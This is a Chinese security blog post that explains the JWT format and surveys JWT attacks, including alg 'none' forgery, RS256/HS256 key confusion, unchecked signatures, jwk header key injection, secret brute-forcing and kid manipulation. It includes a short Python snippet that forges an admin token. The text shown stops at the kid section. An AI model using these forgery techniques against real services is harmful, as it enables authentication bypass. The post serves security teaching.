

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://t.lizina.top/tx">
  <link rel="icon" href="https://t.lizina.top/tx">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#bdc3c7">
  <meta name="author" content="Probius">
  <meta name="keywords" content="">
  
    <meta name="description" content="针对祥云杯中一道基于pythonJWT的Nday题目，谈谈Jwt和它存在的一些安全问题">
<meta property="og:type" content="article">
<meta property="og:title" content="From Jwt To The XiangYunCup FunWeb">
<meta property="og:url" content="https://blog.probius.xyz/2022/11/20/From-Jwt-To-The-XiangYunCup-FunWeb/index.html">
<meta property="og:site_name" content="Probius_Official&#39;s Blog">
<meta property="og:description" content="针对祥云杯中一道基于pythonJWT的Nday题目，谈谈Jwt和它存在的一些安全问题">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://nssctf.wdf.ink//img/WDTJ/202302081642528.jpeg">
<meta property="article:published_time" content="2022-11-19T17:22:22.000Z">
<meta property="article:modified_time" content="2023-02-08T08:43:12.697Z">
<meta property="article:author" content="Probius">
<meta property="article:tag" content="Web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://nssctf.wdf.ink//img/WDTJ/202302081642528.jpeg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>From Jwt To The XiangYunCup FunWeb - Probius_Official&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"blog.probius.xyz","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":"§"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":"G-Z6B9XVRJ8K","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript('https://www.google-analytics.com/analytics.js', function() {
          window.ga = window.ga || function() { (ga.q = ga.q || []).push(arguments) };
          ga.l = +new Date;
          ga('create', 'G-Z6B9XVRJ8K', 'auto');
          ga('send', 'pageview');
        });
      }
    </script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>探姬の星灵枢纽</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://t.lizina.top/pc') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="From Jwt To The XiangYunCup FunWeb"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-11-20 01:22" pubdate>
          2022年11月20日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          14k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          121 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">From Jwt To The XiangYunCup FunWeb</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="About-JWT"><a href="#About-JWT" class="headerlink" title="About JWT"></a>About JWT</h2><h3 id="What-is-JWT"><a href="#What-is-JWT" class="headerlink" title="What is JWT"></a>What is JWT</h3><p>Json Web Token(<code>JWT</code>)是一个开放标准(<a target="_blank" rel="noopener" href="https://www.rfc-editor.org/rfc/rfc7519">RFC 7519</a>)，它定义了一种紧凑且自包含的方式，用于在各方之间安全地传输信息作为JSON对象。此信息可以验证和信任，因为它足数字签名的。JWT可以使用密钥(使用 HMAC算法)或便用RSA或 ECDSA 的公钥&#x2F;私钥对进行签名。</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667407544497-f7e889c1-fedb-474e-bd81-57d3cdeb67a1.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>注意：本文的重心并不在介绍JWT上，所以在官方文本的基础上会有一些删减。</p>
<p>如需了解更多，可以访问起官方网站，翻阅对应的文献资料：</p>
<p><a target="_blank" rel="noopener" href="https://jwt.io/introduction">https://jwt.io/introduction</a></p>
<p><a target="_blank" rel="noopener" href="https://jwt.io/">https://jwt.io/</a></p>
<hr>
<h3 id="JWT-format"><a href="#JWT-format" class="headerlink" title="JWT format"></a>JWT format</h3><p>JWT的格式大致如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">Header.Payload.Signature<br></code></pre></td></tr></table></figure>

<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667409378048-06076958-9b69-42c2-8f0a-2809a7b250b3.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>对于任意JWT令牌，我们可以在jwt.io官网或者其他jwt解码工具查看详细：</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667412576430-2fd13d4e-8f7f-4cb6-b084-e8e9d5b7036c.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="Header"><a href="#Header" class="headerlink" title="Header"></a>Header</h4><p><code>JWT头</code>是一个描述JWT元数据的<code>JSON对象</code>，<code>alg属性</code>表示签名使用的算法，默认为HMAC SHA256（写为HS256）；<code>typ属性</code>表示令牌的类型，JWT令牌统一写为JWT。</p>
<p>最后，使用Base64 URL算法将上述JSON对象转换为字符串保存</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>  <span class="hljs-attr">&quot;alg&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;HS256&quot;</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;typ&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;JWT&quot;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<h4 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h4><p><code>有效载荷</code>部分，是JWT的主体内容部分，也是一个<code>JSON对象</code>，包含需要传递的数据。 </p>
<p>JWT指定七个默认字段供选择：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plain">iss：发行人<br>nbf：在此之前不可用(时间戳)<br>iat：发布时间(时间戳)<br>exp：到期时间(时间戳)<br>sub：主题<br>aud：用户<br>jti：JWT ID用于标识该JWT<br></code></pre></td></tr></table></figure>

<p>这些预定义的字段并不要求强制使用。</p>
<p>除以上默认字段外，我们还可以自定义私有字段，一般会把包含用户信息的数据放到payload中，如下例：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>  <span class="hljs-attr">&quot;exp&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">1667141915</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;iat&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">1667141615</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;is_admin&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">0</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;is_login&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">1</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;jti&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;5vpXRcirMlzlMPnx0sSX7w&quot;</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;nbf&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">1667141615</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;password&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;f61d&quot;</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;username&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;f61d&quot;</span><br><span class="hljs-punctuation">&#125;</span><br>#################################################################<br><span class="hljs-punctuation">[</span>+<span class="hljs-punctuation">]</span> exp = <span class="hljs-number">1667141915</span>    ==&gt; TIMESTAMP = <span class="hljs-number">2022</span><span class="hljs-number">-10</span><span class="hljs-number">-30</span> <span class="hljs-number">22</span><span class="hljs-punctuation">:</span><span class="hljs-number">58</span><span class="hljs-punctuation">:</span><span class="hljs-number">35</span> (UTC)<br><span class="hljs-punctuation">[</span>+<span class="hljs-punctuation">]</span> iat = <span class="hljs-number">1667141615</span>    ==&gt; TIMESTAMP = <span class="hljs-number">2022</span><span class="hljs-number">-10</span><span class="hljs-number">-30</span> <span class="hljs-number">22</span><span class="hljs-punctuation">:</span><span class="hljs-number">53</span><span class="hljs-punctuation">:</span><span class="hljs-number">35</span> (UTC)<br><span class="hljs-punctuation">[</span>+<span class="hljs-punctuation">]</span> is_admin = <span class="hljs-number">0</span><br><span class="hljs-punctuation">[</span>+<span class="hljs-punctuation">]</span> is_login = <span class="hljs-number">1</span><br><span class="hljs-punctuation">[</span>+<span class="hljs-punctuation">]</span> jti = <span class="hljs-string">&quot;5vpXRcirMlzlMPnx0sSX7w&quot;</span><br><span class="hljs-punctuation">[</span>+<span class="hljs-punctuation">]</span> nbf = <span class="hljs-number">1667141615</span>    ==&gt; TIMESTAMP = <span class="hljs-number">2022</span><span class="hljs-number">-10</span><span class="hljs-number">-30</span> <span class="hljs-number">22</span><span class="hljs-punctuation">:</span><span class="hljs-number">53</span><span class="hljs-punctuation">:</span><span class="hljs-number">35</span> (UTC)<br><span class="hljs-punctuation">[</span>+<span class="hljs-punctuation">]</span> password = <span class="hljs-string">&quot;f61d&quot;</span><br><span class="hljs-punctuation">[</span>+<span class="hljs-punctuation">]</span> username = <span class="hljs-string">&quot;f61d&quot;</span><br></code></pre></td></tr></table></figure>

<h4 id="Signature"><a href="#Signature" class="headerlink" title="Signature"></a>Signature</h4><p>签名哈希部分是对上面两部分数据签名，需要使用base64编码后的header和payload数据，通过指定的算法生成哈希,公式如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">HMACSHA256(<br>  base64UrlEncode(header) + &quot;.&quot; +<br>  base64UrlEncode(payload),<br>  secret)<br></code></pre></td></tr></table></figure>

<p>注意的是，如果header部分中，参数alg置空，则无该部分(我们也称其为<code>Nonsecure JWT</code>)。</p>
<h4 id="All-IN"><a href="#All-IN" class="headerlink" title="All IN"></a>All IN</h4><p>在计算出签名哈希后，JWT头，有效载荷和签名哈希的三个部分组合成一个字符串，每个部分用.分隔，就构成整个JWT对象</p>
<p>注意JWT每部分的作用，在服务端接收到客户端发送过来的JWT token之后：</p>
<ul>
<li>header和payload可以直接利用base64解码出原文，从header中获取哈希签名的算法，从payload中获取有效数据</li>
<li>signature由于使用了不可逆的加密算法，无法解码出原文，它的作用是校验token有没有被篡改。服务端获取header中的加密算法之后，利用该算法加上secretKey对header、payload进行加密，比对加密后的数据和客户端发送过来的是否一致。注意secretKey只能保存在服务端，而且对于不同的加密算法其含义有所不同，一般对于MD5类型的摘要加密算法，secretKey实际上代表的是盐值</li>
</ul>
<h3 id="JWT-Classification"><a href="#JWT-Classification" class="headerlink" title="JWT Classification"></a>JWT Classification</h3><h4 id="Nonsecure-JWT"><a href="#Nonsecure-JWT" class="headerlink" title="Nonsecure JWT"></a>Nonsecure JWT</h4><p>header部分中，参数alg置空的JWT。</p>
<h4 id="JWS"><a href="#JWS" class="headerlink" title="JWS"></a>JWS</h4><p><code>JWS</code> ，也就是<code>JWT Signature</code>，其结构就是在之前<code>nonsecure JWT</code>的基础上，在头部声明签名算法，并在最后添加上签名。</p>
<p>创建签名，是保证jwt不能被他人随意篡改。</p>
<p>我们通常使用的JWT一般都是<code>JWS</code></p>
<p>为了完成签名，除了用到header信息和payload信息外，还需要算法的密钥，也就是secretKey。</p>
<p>加密的算法一般有两类：</p>
<ul>
<li>对称加密：secretKey指加密密钥，可以生成签名与验签</li>
<li>非对称加密：secretKey指私钥，只用来生成签名，不能用来验签(验签用的是公钥)</li>
</ul>
<p>JWT的密钥或者密钥对，一般统一称为<code>JSON Web Key</code>，也就是<code>JWK</code></p>
<p>如需了解JWT的签名算法可以前往其官网查阅：</p>
<p><a target="_blank" rel="noopener" href="https://jwt.io/libraries">https://jwt.io/libraries</a></p>
<h3 id="Use"><a href="#Use" class="headerlink" title="Use"></a>Use</h3><p>如果您想知道如何将JWT用于开发中，请移步另一篇文章：(写作中……)</p>
<h3 id="Verification"><a href="#Verification" class="headerlink" title="Verification"></a>Verification</h3><p>JWT的后端验证是比较多样的，大概的流程可以参考下图：</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667832274679-a093cb89-0329-4557-9917-46ad794742b5.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>这也是说JWT的后端验证多样的原因，如何利用JWT的信息和signature综合的去验证JWT的有效性，在开发者选择使用JWT的适合就要做好相应的准备——生成和验证是一体的。</p>
<h2 id="Common-Security-risk-of-JWT"><a href="#Common-Security-risk-of-JWT" class="headerlink" title="Common Security risk of JWT"></a>Common Security risk of JWT</h2><p>在简单了解了JWT之后，我们来看看JWT常见的一些安全风险：</p>
<h3 id="敏感信息泄露"><a href="#敏感信息泄露" class="headerlink" title="敏感信息泄露"></a>敏感信息泄露</h3><p>如果不当的使用Header和Payload部分，在其中存储一些敏感信息，可能会产生一定安全风险，因为两者只经过简单的base64编码。</p>
<p>当然这种在实际环境中很少见，但是却能成为个别CTF比赛的web签到题的考点（</p>
<h3 id="签名算法替换"><a href="#签名算法替换" class="headerlink" title="签名算法替换"></a>签名算法替换</h3><p>如果应用不限制 JWT中使用的算法类型，导致算法类型可控，这样会带给JWT巨大的安全风险。</p>
<h4 id="签名算法置空（CVE-2015-2951）"><a href="#签名算法置空（CVE-2015-2951）" class="headerlink" title="签名算法置空（CVE-2015-2951）"></a>签名算法置空（CVE-2015-2951）</h4><p>我们知道在JWT的头部中声明了token的类型和签名用的算法：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;<br>  <span class="hljs-string">&quot;alg&quot;</span>: <span class="hljs-string">&quot;HS256&quot;</span>,<br>  <span class="hljs-string">&quot;typ&quot;</span>: <span class="hljs-string">&quot;JWT&quot;</span><br>&#125;<br></code></pre></td></tr></table></figure>

<p>上header指定了签名算法为<code>HS256</code>，意味着服务端利用此算法将header和payload进行加密，形成signature，同时接收到token时，也会利用此算法对signature进行签名验证。</p>
<p>如果后端程序信任来源的JWT头部，那么当我们改变器头部算法，将其置空设置为</p>
<figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arcade"><span class="hljs-built_in">None</span><br></code></pre></td></tr></table></figure>

<p>那么服务端接收到token后会将其认定为无加密算法， 于是对signature的检验也就失效了，那么我们就可以随意修改payload部分伪造token。</p>
<p>当然这一切的前提是，后端信任前端。</p>
<p>比如2022年首届数据安全题目中的一道web题，我们就可以通过该方法伪造token。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 可以通过令algorithm为空，绕过对签名和密钥的检验</span><br><span class="hljs-keyword">import</span> jwt<br>payload = &#123;<br><span class="hljs-string">&#x27;username&#x27;</span>: <span class="hljs-string">&#x27;admin&#x27;</span><br>&#125;<br>token = jwt.encode(payload=payload,algorithm=<span class="hljs-literal">None</span>,key=<span class="hljs-literal">None</span>)<br><span class="hljs-built_in">print</span>(token)<br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VybmFtZSI6ImFkbWluIn0.</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667835816438-f3804cff-1113-48bf-87d2-c39f6138eb8d.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="非对称密码算法修改为对称算法-密钥混淆CVE-2016-10555"><a href="#非对称密码算法修改为对称算法-密钥混淆CVE-2016-10555" class="headerlink" title="非对称密码算法修改为对称算法(密钥混淆CVE-2016-10555)"></a>非对称密码算法修改为对称算法(密钥混淆CVE-2016-10555)</h4><p>HMAC和RSA是JWT比较常见的两种算法。</p>
<p>HMAC：token使用密钥签名，然后使用相同的密钥进行验证。（对称）</p>
<p>RSA    ：token将首先使用私钥创建，然后使用相应的公钥进行验证。（非对称）</p>
<p>对于两者，密钥和私钥都要保密，因为签名和校验依赖它们。</p>
<p>这里假设一个网站使用RSA生成和验证token，那么这里会有两个变量参与：私钥Prit和公钥Pub。</p>
<p>如果签名算法可控，我们将算法头改为<code>HMAC</code>，使用RSA的公钥Pub来生成一个token，那么我们将构造好的JWT发送回去时，后端验证查询则会用RSA的公钥Pub以HMAC的算法验证方式来验证token。</p>
<p>当然如果该漏洞存在，那么对于使用非对称加密的token，我们都可以尝试这样的方法，比如RS256变成HS256，比如这一道CTF题目：</p>
<p><a target="_blank" rel="noopener" href="https://skysec.top/2018/05/19/2018CUMTCTF-Final-Web/#Pastebin/">https://skysec.top/2018/05/19/2018CUMTCTF-Final-Web/#Pastebin/</a></p>
<h3 id="签名未校验-x2F-无效签名"><a href="#签名未校验-x2F-无效签名" class="headerlink" title="签名未校验&#x2F; 无效签名"></a>签名未校验&#x2F; 无效签名</h3><p>某些服务端并未校验JWT签名，可以尝试修改signature后(或者直接删除signature)，亦或者直接修改payload。</p>
<p>找到一个只有在被授权通过有效的JWT进行访问时才能访问此页面，我们将重放请求并寻找响应的变化以发现问题。</p>
<p>比如：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoicHJvYml1cyIsImFjdGlvbiI6InByb2ZpbGUifQ<span class="hljs-number">.5</span>GVEWIw7-IdM9fQMt6H5Wxpmp1HpnyQb33CsXnZ9qKM<br></code></pre></td></tr></table></figure>

<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667840468890-8287cdc1-a5bd-4d5b-ba08-abc6165b11b8.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>如果我们直接修改payload段，使用修改后的token重放，如访问页面正常，则说明漏洞存在。</p>
<h3 id="伪造密钥-CVE-2018-0114"><a href="#伪造密钥-CVE-2018-0114" class="headerlink" title="伪造密钥(CVE-2018-0114)"></a>伪造密钥(CVE-2018-0114)</h3><p>jwk是header里的一个参数，用于指出密钥，存在被伪造的风险。</p>
<p>比如CVE-2018-0114： </p>
<p><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0114">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0114</a></p>
<p>攻击者可以通过以下方法来伪造JWT：删除原始签名，向标头添加新的公钥，然后使用与该公钥关联的私钥进行签名。</p>
<p>比如：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>  <span class="hljs-attr">&quot;typ&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;JWT&quot;</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;alg&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;RS256&quot;</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;jwk&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>    <span class="hljs-attr">&quot;kty&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;RSA&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;kid&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;TEST&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;use&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;sig&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;e&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;AQAB&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;n&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;oUGnPChFQAN1xdA1_f_FWZdFAis64o5hdVyFm4vVFBzTIEdYmZZ3hJHsWi5b_m_tjsgjhCZZnPOLn-ZVYs7pce__rDsRw9gfKGCVzvGYvPY1hkIENNeBfSaQlBhOhaRxA85rBkg8BX7zfMRQJ0fMG3EAZhYbr3LDtygwSXi66CCk4zfFNQfOQEF-Tgv1kgdTFJW-r3AKSQayER8kF3xfMuI7-VkKz-yyLDZgITyW2VWmjsvdQTvQflapS1_k9IeTjzxuKCMvAl8v_TFj2bnU5bDJBEhqisdb2BRHMgzzEBX43jc-IHZGSHY2KA39Tr42DVv7gS--2tyh8JluonjpdQ&quot;</span><br>  <span class="hljs-punctuation">&#125;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<h3 id="签名密钥爆破"><a href="#签名密钥爆破" class="headerlink" title="签名密钥爆破"></a>签名密钥爆破</h3><p>按照JWT的结构，我们是可以得知其使用的签名算法的，如果可以爆破出对应的密钥，我们就能随意的”伪造”token了。</p>
<p>这里以HMAC签名举例：</p>
<p>HMAC签名密钥（例如HS256 &#x2F; HS384 &#x2F; HS512）使用对称加密，这意味着对令牌进行签名的密钥也用于对其进行验证。由于签名验证是一个自包含的过程，因此可以测试令牌本身的有效密钥，而不必将其发送回应用程序进行验证。<br>因此，HMAC JWT破解是离线的，通过JWT破解工具，可以快速检查已知的泄漏密码列表或默认密码。</p>
<p>工具会在下边介绍。</p>
<h3 id="泄露密钥"><a href="#泄露密钥" class="headerlink" title="泄露密钥"></a>泄露密钥</h3><p>这个一般得打组合拳，配合如目录遍历、XXE、SSRF等可以读取存储密钥值文件漏洞，这样就可以窃取密钥并签署任意token。</p>
<h3 id="KID操控"><a href="#KID操控" class="headerlink" title="KID操控"></a>KID操控</h3><p>KID代表“密钥序号”（Key ID）。它是JWT头部的一个可选字段，开发人员可以用它标识认证token的某一密钥。KID参数的正确用法如下所示：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>    <span class="hljs-attr">&quot;alg&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;HS256&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;typ&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;JWT&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;kid&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;1&quot;</span>        <span class="hljs-comment">//使用密钥1验证token</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>由于此字段是由用户控制的，因此可能会被恶意操纵并导致危险的后果。</p>
